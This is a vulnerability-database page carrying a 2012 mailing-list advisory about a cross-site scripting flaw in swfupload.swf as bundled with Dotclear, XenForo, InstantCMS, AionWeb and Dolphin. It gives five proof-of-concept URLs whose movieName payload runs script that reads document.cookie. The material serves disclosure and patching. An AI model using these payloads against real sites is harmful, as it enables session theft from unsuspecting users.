Vulners
Lucene search
SWF Upload Cross Site Scripting
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | WordPress 3.3.1 swfupload.swf Cross Site Scripting | 10 Nov 201200:00 | – | zdt |
| SWFUpload Content Spoofing / Cross Site Scripting Vulnerabilities | 12 Mar 201300:00 | – | zdt |
| Dotclear XSS Vulnerabilities | 14 Apr 201300:00 | – | zdt |
| Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities | 23 Jan 201400:00 | – | zdt |
 | CVE-2012-3414 | 29 Jun 201200:00 | – | circl |
 | CVE-2012-3414 | 19 Jul 201310:00 | – | cve |
 | CVE-2012-3414 | 19 Jul 201310:00 | – | cvelist |
 | CVE-2012-3414 | 19 Jul 201310:00 | – | debiancve |
 | EUVD-2012-3384 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-3414 | 19 Jul 201314:36 | – | nvd |
10
`Hello list!
I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in WordPress
(CVE-2012-3414) and that this hole is available in many web applications.
In previous letter I've wrote the information about different versions of
this swf-file (with different names) and all versions of WordPress, which
contain any of these swf-files. And here is information about Dotclear,
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications
which are bundled with swfupload.swf.
-------------------------
Affected products:
-------------------------
Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb,
Dolphin. There is no information that they have fixed this vulnerability in
their software (at that this vulnerability was fixed in WordPress 3.3.2 at
20.04.2012).
Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this
vulnerability was fixed and patch was released for previous versions
(already at 19.06.2012).
The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.
----------
Details:
----------
XSS (WASC-08):
Dotclear:
http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
XenForo:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
InstantCMS:
http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
AionWeb:
http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Dolphin:
http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Swfupload is used in WordPress, plugins for WP and in other web
applications. There are many web applications with it, not as many as those
which are using JW Player (http://securityvulns.com/docs28176.html) and JW
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in
them I've disclosed earlier), but still a lot of.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Nov 2012 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.06259